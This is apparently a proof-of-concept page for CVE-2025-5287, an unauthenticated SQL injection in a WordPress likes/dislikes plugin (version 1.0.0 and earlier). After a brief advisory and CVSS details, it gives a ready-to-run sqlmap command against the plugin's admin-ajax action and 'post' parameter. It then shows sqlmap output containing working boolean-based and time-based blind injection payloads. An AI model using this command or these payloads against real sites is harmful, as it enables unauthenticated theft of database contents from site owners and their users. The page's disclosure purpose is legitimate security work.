CVE-2025-5287 PoC — Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection

Description

Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection

Readme

# CVE-2025-5287
Likes and Dislikes Plugin <= 1.0.0 - Unauthenticated SQL Injection

# Description

The Likes and Dislikes Plugin plugin for WordPress is vulnerable to SQL Injection via the 'post' parameter in all versions up to, and including, 1.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

## Details

- **Type**: plugin
- **Slug**: inprosysmedia-likes-dislikes-post
- **Affected Version**: 1.0.0
- **CVSS Score**: 7.5
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **CVE**: CVE-2025-5287
- **Status**: Closed

POC
---
```
python3 sqlmap.py -u 'http://kubernetes.docker.internal:8999/wp-admin/admin-ajax.php' --data='action=my_likes_dislikes_action&post=1&state=dislike' --level=2 --risk=2 --dbms='MySQL' -p post --random-agent
```

```
sqlmap identified the following injection point(s) with a total of 372 HTTP(s) requests:
---
Parameter: post (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: action=my_likes_dislikes_action&post=1 AND 8197=(SELECT (CASE WHEN (8197=8197) THEN 8197 ELSE (SELECT 7036 UNION SELECT 3343) END))-- -&state=dislike

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=my_likes_dislikes_action&post=1 AND (SELECT 7318 FROM (SELECT(SLEEP(5)))OIPg)&state=dislike
---
```

File Snapshot

Remarks